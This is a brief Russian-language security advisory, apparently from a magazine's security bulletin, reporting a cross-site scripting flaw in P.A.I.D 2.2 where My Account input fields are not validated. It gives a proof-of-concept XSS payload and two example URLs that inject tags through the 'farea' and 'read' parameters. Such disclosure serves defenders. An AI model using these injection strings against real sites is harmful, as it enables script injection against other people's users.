Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в P.A.I.D.
Компьютер для продвинутых
пользователей
В этом выпуске:
P.A.I.D
ПО: P.A.I.D
Версия: 2.2
Уязвимость:
Формы ввода находящиеся внутри My Account не проверяются. Для проведения
XSS-атаки необходимо в поле ввода ввести: "><IMG
SRC=javascript:alert('XSS')><". Использование: http://www.example.com/paid/faq.php?farea=2"><img%20src=lol.jpg><"
http://example.com/paid/index.php?read=<IMG%20SRC=javascript:alert('XSS')>